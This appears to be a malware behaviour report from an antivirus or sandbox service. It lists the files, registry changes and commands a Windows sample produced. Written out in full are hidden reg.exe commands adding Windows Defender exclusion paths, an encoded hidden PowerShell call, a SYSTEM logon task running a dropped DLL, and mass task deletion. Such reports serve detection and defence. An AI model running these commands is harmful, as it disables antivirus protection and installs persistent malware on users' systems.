Technical Information
- <SYSTEM32>\tasks\gyuxxehbw
- %WINDIR%\tasks\jddzyhqyfipedoi.job
- <SYSTEM32>\tasks\jddzyhqyfipedoi
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\EpcEJPhsU' = '0'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\ZPnqDDJvVIE' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\ZPnqDDJvVIE' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\kzdHAnWxKxUn' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\kzdHAnWxKxUn' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\kzdHAnWxKxUn' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\ueeIVFjZJDeWYRHKDbR' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\ueeIVFjZJDeWYRHKDbR' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\ueeIVFjZJDeWYRHKDbR' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%PROGRAMDATA%\kwXcNbfqpcqAgDVB' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\WcvpYyOCAPBiYLif' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%PROGRAMDATA%\kwXcNbfqpcqAgDVB' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%LOCALAPPDATA%Low\UPPIBGlQjiGyE' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%LOCALAPPDATA%Low\UPPIBGlQjiGyE' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%LOCALAPPDATA%Low\UPPIBGlQjiGyE' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\WEexobxRFxDZXHoxB' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\WEexobxRFxDZXHoxB' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\WEexobxRFxDZXHoxB' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\WcvpYyOCAPBiYLif' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\ZPnqDDJvVIE' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%PROGRAMDATA%\kwXcNbfqpcqAgDVB' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\TaJoPAkogKnU2' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\WcvpYyOCAPBiYLif' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\JqemkQhrUPhMC' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\TaJoPAkogKnU2' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\ZPnqDDJvVIE' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\kzdHAnWxKxUn' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\ueeIVFjZJDeWYRHKDbR' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%PROGRAMDATA%\kwXcNbfqpcqAgDVB' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%LOCALAPPDATA%Low\UPPIBGlQjiGyE' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\WEexobxRFxDZXHoxB' = '0'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\WcvpYyOCAPBiYLif\BzHIOWab' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\TaJoPAkogKnU2' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\WcvpYyOCAPBiYLif\BzHIOWab' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\WcvpYyOCAPBiYLif\BzHIOWab' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\EpcEJPhsU' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\EpcEJPhsU' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\EpcEJPhsU' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\JqemkQhrUPhMC' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\JqemkQhrUPhMC' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\JqemkQhrUPhMC' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\TaJoPAkogKnU2' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\WcvpYyOCAPBiYLif' = '00000000'
- %WINDIR%\temp\wcvpyyocapbiylif\bzhiowab\nuvalejfodhfcvho.vbs
- %ProgramFiles(x86)%\epcejphsu\nblafn.dll
- <SYSTEM32>\tasks\gyuxxehbw
- %WINDIR%\temp\wcvpyyocapbiylif\bzhiowab\nuvalejfodhfcvho.vbs
- %PROGRAMDATA%\ntuser.pol
- %HOMEPATH%\ntuser.pol
- '%WINDIR%\syswow64\wscript.exe' "%WINDIR%\Temp\WcvpYyOCAPBiYLif\BzHIOWab\nuvAlEJFODhFCvHo.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\ueeIVFjZJDeWYRHKDbR" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\ueeIVFjZJDeWYRHKDbR" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\ueeIVFjZJDeWYRHKDbR" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\kwXcNbfqpcqAgDVB" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\kwXcNbfqpcqAgDVB" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\kwXcNbfqpcqAgDVB" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\kwXcNbfqpcqAgDVB" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\ueeIVFjZJDeWYRHKDbR" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\kzdHAnWxKxUn" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\UPPIBGlQjiGyE" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\UPPIBGlQjiGyE" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\WEexobxRFxDZXHoxB" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\WEexobxRFxDZXHoxB" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\WEexobxRFxDZXHoxB" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\WEexobxRFxDZXHoxB" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\WcvpYyOCAPBiYLif" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\WcvpYyOCAPBiYLif" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\UPPIBGlQjiGyE" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%LOCALAPPDATA%Low\UPPIBGlQjiGyE" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\kzdHAnWxKxUn" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\JqemkQhrUPhMC" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '<SYSTEM32>\gpupdate.exe' /force' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\EpcEJPhsU" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\EpcEJPhsU" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\EpcEJPhsU" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\EpcEJPhsU" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\JqemkQhrUPhMC" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\JqemkQhrUPhMC" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\JqemkQhrUPhMC" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\TaJoPAkogKnU2" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\kzdHAnWxKxUn" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\TaJoPAkogKnU2" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\TaJoPAkogKnU2" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\TaJoPAkogKnU2" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\ZPnqDDJvVIE" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\ZPnqDDJvVIE" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\ZPnqDDJvVIE" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\ZPnqDDJvVIE" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\kzdHAnWxKxUn" /t REG_DWORD /d 0 /reg:32' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\WcvpYyOCAPBiYLif" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%WINDIR%\Temp\WcvpYyOCAPBiYLif" /t REG_DWORD /d 0 /reg:64' (with hidden window)
- '%WINDIR%\syswow64\schtasks.exe' /CREATE /TN "gYUxXehbw" /SC once /ST 00:01:29 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZ...
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "HwIewBdOCFjizSn2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "HwIewBdOCFjizSn2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "mIHoURnrrFZoeoa"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "mIHoURnrrFZoeoa"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "mIHoURnrrFZoeoa2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "mIHoURnrrFZoeoa2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "ovDQHRFqjuiIwBT"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "ovDQHRFqjuiIwBT"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "ovDQHRFqjuiIwBT2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "ovDQHRFqjuiIwBT2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "klUWuaezRKBqinM"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "klUWuaezRKBqinM"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "klUWuaezRKBqinM2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "klUWuaezRKBqinM2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "mudcijCcRCAJbfk"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "mudcijCcRCAJbfk"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "mudcijCcRCAJbfk2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "mudcijCcRCAJbfk2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "HdnQYgyxzGNsQPi"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "HdnQYgyxzGNsQPi"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "HdnQYgyxzGNsQPi2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "HdnQYgyxzGNsQPi2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "cHfCoNkANzRDfuw"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "cHfCoNkANzRDfuw"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "cHfCoNkANzRDfuw2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "cHfCoNkANzRDfuw2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "sJmRNNQmilvGZkk"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "sJmRNNQmilvGZkk"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "sJmRNNQmilvGZkk2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "HwIewBdOCFjizSn"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "azeCIWjuqYhqXvPDaOZ"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "HwIewBdOCFjizSn"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "iczwyGpFJMvAKqh2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "azeCIWjuqYhqXvPDaOZ2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "azeCIWjuqYhqXvPDaOZ2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "UtIKwUmbRJGepGftqgG"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "UtIKwUmbRJGepGftqgG"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "UtIKwUmbRJGepGftqgG2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "UtIKwUmbRJGepGftqgG2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "vQyKRbUNtFZXPITpczV"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "vQyKRbUNtFZXPITpczV"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "vQyKRbUNtFZXPITpczV2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "vQyKRbUNtFZXPITpczV2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "AWpsuTutGPitDnbWHVU"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "AWpsuTutGPitDnbWHVU"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "AWpsuTutGPitDnbWHVU2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "AWpsuTutGPitDnbWHVU2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "JuOwSuxqemngfaAClWj"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "JuOwSuxqemngfaAClWj"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "JuOwSuxqemngfaAClWj2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "JuOwSuxqemngfaAClWj2"
- '%WINDIR%\syswow64\schtasks.exe' /CREATE /TR "rundll32 \"%ProgramFiles(x86)%\EpcEJPhsU\NBLaFN.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "JDDzyHQYfipeDOi" /V1 /F
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "RgOkMYciFLprHbp"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "RgOkMYciFLprHbp"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "RgOkMYciFLprHbp2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "RgOkMYciFLprHbp2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "qCWmixqItkfFBJu"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "qCWmixqItkfFBJu"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "qCWmixqItkfFBJu2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "qCWmixqItkfFBJu2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "iczwyGpFJMvAKqh"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "iczwyGpFJMvAKqh"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "iczwyGpFJMvAKqh2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "azeCIWjuqYhqXvPDaOZ"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "sJmRNNQmilvGZkk2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "BHgVOCrLEaPLWX"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "HTLyzFrqDpUxg2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "HTLyzFrqDpUxg2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "YFjIGlAcClFmN"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "YFjIGlAcClFmN"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "YFjIGlAcClFmN2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "YFjIGlAcClFmN2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "lgszEHEuMcBBI"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "lgszEHEuMcBBI"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "lgszEHEuMcBBI2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "lgszEHEuMcBBI2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "kEbZTSxlcOlRf"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "kEbZTSxlcOlRf"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "kEbZTSxlcOlRf2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "sSNzQSjCyZyvAODCi"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "kEbZTSxlcOlRf2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "BeAGdXVhhtWta"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "BeAGdXVhhtWta2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "BeAGdXVhhtWta2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "BWBIcpMrpuDle"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "BWBIcpMrpuDle"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "BWBIcpMrpuDle2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "BWBIcpMrpuDle2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "qrtBpalthMSTn"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "qrtBpalthMSTn"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "qrtBpalthMSTn2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "qrtBpalthMSTn2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "ELszhaopGfXJG"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "ELszhaopGfXJG"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "HTLyzFrqDpUxg"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "HTLyzFrqDpUxg"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "DWzNbmxZdepbGK"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "DWzNbmxZdepbGK"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "LfkgMigEKkJvI"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "KSEyzjkpuBwUAv"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "KSEyzjkpuBwUAv"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "JIcNiqIBwUzWWc"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "JIcNiqIBwUzWWc"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "QXfYQJuHgUZYhM"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "QXfYQJuHgUZYhM"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "KdxmCdTrbLCOEA"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "KdxmCdTrbLCOEA"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "jiKAtVxeVLKjiz"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "jiKAtVxeVLKjiz"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "DCeTfIMylnffGK"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "DCeTfIMylnffGK"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "KiOmsCdSlrgMtZ"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "KiOmsCdSlrgMtZ"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "hrkcjqnYLJOdof"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "hrkcjqnYLJOdof"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "fEwcNqYSYKCNgp"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "fEwcNqYSYKCNgp"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "nnhhQsOdXIjmP"
